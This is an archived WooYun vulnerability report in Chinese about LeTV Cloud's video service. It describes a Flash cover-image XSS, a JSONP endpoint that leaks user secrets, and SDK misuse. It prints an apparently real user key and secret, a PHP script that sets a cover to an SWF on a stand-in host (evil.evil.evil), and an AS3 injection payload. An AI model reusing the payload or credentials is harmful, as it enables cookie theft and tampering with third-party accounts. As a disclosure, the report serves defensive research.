当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159012

漏洞标题:乐视云XSS指谁打谁

相关厂商:乐视网

漏洞作者: 黑魔ひめ

提交时间:2015-12-07 13:57

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-10: 厂商已经确认,细节仅向厂商公开
2015-12-20: 细节向核心白帽子及相关领域专家公开
2015-12-30: 细节向普通白帽子公开
2016-01-09: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

这个XSS可以想打谁打谁。
证明那里给出用乐视打游民的方法。
这次审核不通过我就不提交了。

详细说明:

1.首先是XSS
在云点播后台可以修改视频封面
抓个包改为swf后缀的as3格式文件
云点播的flash由as3编写,封面下载后直接appendChild()显示,而未检查其类型,导致可以执行外部代码,或者是CVE-2015-5119之类的东西。
把恶意的视频贴到论坛里就可以收cookie了。
2.其次是敏感信息泄露
http://api.letvcloud.com/gpc.php?cf=html5&sign=signxxxxx&ver=2.1&format=jsonp&pver=H5_Vod_20151203_4.0.9&bver=chrome49.0.2578.0&uuid=0AF6ED13C6122083C2D9E3DBA5780EBB_0&page_url=http%3A%2F%2Fyuntv.letv.com%2Fbcloud.html%3Fvu%3Dd5669d8923%26uu%3Dcfd9191aeb%26auto_play%3D0%26gpcflag%3D1%26width%3D640%26height%3D360&uu=cfd9191aeb&vu=d5669d8923&pf=html5&spf=0&callback=letvcloud144941740179958
乐视云点播用户后台预览视频的时候下载的jsonp
这里泄露了用户的secret,uu
利用用户的secret,uu可以进行流量统计,修改视频描述,标题,暂停视屏等操作。
3.最后,未授权访问(?)
http://help.letvcloud.com/Wiki.jsp?page=ResourceDownload
这里可以下载到云点播的php版本sdk
里面可以加上这样一段代码

public function videoUpdatePic($video_id,$pic='')
{
$api = 'video.update';
$params['video_id'] = $video_id;
if(!empty($pic)){ $params['init_pic'] = $pic;
$params['img'] = $pic; }
return self::httpCall($api, $params);
}


这个function可以实现不登录后台的情况下修改视频封面。

漏洞证明:

攻击http://www.gamersky.com/news/201509/665108.shtml
这个页面
首先抓个包看一下视频id:15879069
其次通过2获得游民的uu和私钥
public $user_unique='cfd9191aeb';
public $secret_key='a8b27caefde043c5e51d53b65b2dce3f';
最后利用

<?php
require("LetvCloudV1.php");
$leApi = new LetvCloudV1();
echo $leApi->videoUpdatePic(15879069,'http://evil.evil.evil/xss.swf');
?>


as3代码

ExternalInterface.call("function xss(){$(\"#leshitvauto\").before(\"<img src='http://www.sudops.com/wp-content/uploads/2014/07/wooyun-logo.png'></img>\");$(\"#leshitvauto\").remove();}");


配合1、3
修改其封面
达到在页面内插入wooyunLogo的效果。

截图


由于swf可以写任意js代码。所以窃取cookie,模拟点击,等等都轻而易举。

修复方案:

过滤

版权声明:转载请注明来源 黑魔ひめ@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-10 16:46

厂商回复:

感谢关注乐视安全,此问题已联系业务部门马上进行整改。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-02-16 23:54 | 黑魔ひめ ( 路人 | Rank:5 漏洞数:2 | 教我做游戏吧。。。)

    _(:3」∠)_能说差不多等于没修复么